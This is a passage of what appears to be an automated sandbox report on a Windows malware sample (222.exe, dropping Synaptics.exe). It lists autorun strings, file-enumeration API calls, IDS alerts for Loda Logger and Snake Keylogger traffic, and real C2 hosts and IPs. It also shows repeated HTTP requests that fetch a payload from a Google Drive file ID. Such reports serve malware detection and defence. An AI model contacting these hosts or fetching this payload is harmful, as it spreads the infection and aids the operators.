                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49938 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49940 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49951 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49960 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49966 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49972 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49974 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49974 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49983 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49984 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50002 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50004 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50026 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50028 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50045 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50047 version: TLS 1.2
                              Source: 222.exe, 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: 222.exe, 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: 222.exe, 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: 222.exeBinary or memory string: [autorun]
                              Source: 222.exeBinary or memory string: [autorun]
                              Source: 222.exeBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: RCX6FEC.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX6FEC.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX6FEC.tmp.0.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0077DD92
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B2044
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B219F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007B24A9
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_007A6B3F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_007A6E4A
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007AF350
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AFD47 FindFirstFileW,FindClose,2_2_007AFD47
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_007AFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00492044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00492044
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0049219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0049219F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_004924A9
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00486B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00486B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00486E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00486E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_0048F350
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048FD47 FindFirstFileW,FindClose,9_2_0048FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_0048FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0045DD92
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 68MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.5:49712 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.5:49733 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49733 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49787 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49895 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.5:50122 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50122 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49976 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50184 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50190 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50187 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.5:50192 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50192 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50191 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50193 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:50075 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49714 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49720 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49722 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49709 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49736 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49718 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49752 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49726 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49744 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49766 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49728 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49754 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49737 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49765 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49776 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49772 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49761 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49710 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49742 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49759 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49747 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49771 -> 142.250.186.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49745 -> 142.250.186.110:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_007B550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
